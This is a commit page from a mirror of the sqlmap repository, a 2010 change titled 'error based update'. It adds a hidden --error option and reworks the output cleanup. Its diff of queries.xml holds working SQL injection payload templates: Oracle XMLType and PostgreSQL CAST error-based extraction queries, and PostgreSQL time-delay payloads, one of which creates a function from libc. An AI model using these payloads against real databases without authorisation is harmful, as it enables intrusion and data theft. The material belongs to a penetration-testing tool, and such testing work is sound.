sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

error based update

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-19 14:47:13 +00:00
parent d0ebe428da
commit 4bc541ec3c
3 changed files with 8 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
lib/parse/cmdline.py
View File

@ -488,6 +488,9 @@ def cmdLineParser():
parser.add_option("--profile", dest="profile", action="store_true", parser.add_option("--profile", dest="profile", action="store_true",
default=False, help=SUPPRESS_HELP) default=False, help=SUPPRESS_HELP)
parser.add_option("--error", dest="error", action="store_true",
default=False, help=SUPPRESS_HELP)
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", default=10, parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", default=10,
help=SUPPRESS_HELP) help=SUPPRESS_HELP)

6
lib/request/inject.py
View File

@ -358,8 +358,8 @@ def __goError(expression, resumeValue=True):
if match: if match:
output = match.group('result') output = match.group('result')
if kb.dbms == "Oracle" and output: if output:
output = output.replace("__SPACE__", " ") output = output.replace("%c%c" % (58, 59), " ").replace("%c%c" % (59, 58), "")
return output return output
@ -385,7 +385,7 @@ def getValue(expression, blind=True, inband=True, error=False, fromUser=False, e
expression = expression.replace("DISTINCT ", "") expression = expression.replace("DISTINCT ", "")
if error: if error or conf.error:
value = __goError(expression) value = __goError(expression)
if not value: if not value:

4
xml/queries.xml
View File

@ -92,7 +92,7 @@
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>--> <!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>-->
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),'__SPACE__'))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/> <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(59)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/> <current_user query="SELECT USER FROM DUAL"/>
@ -176,7 +176,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="AND 1=CAST((%s)::text AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/> <error query="AND 1=CAST((%s)::text||CHR(59)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>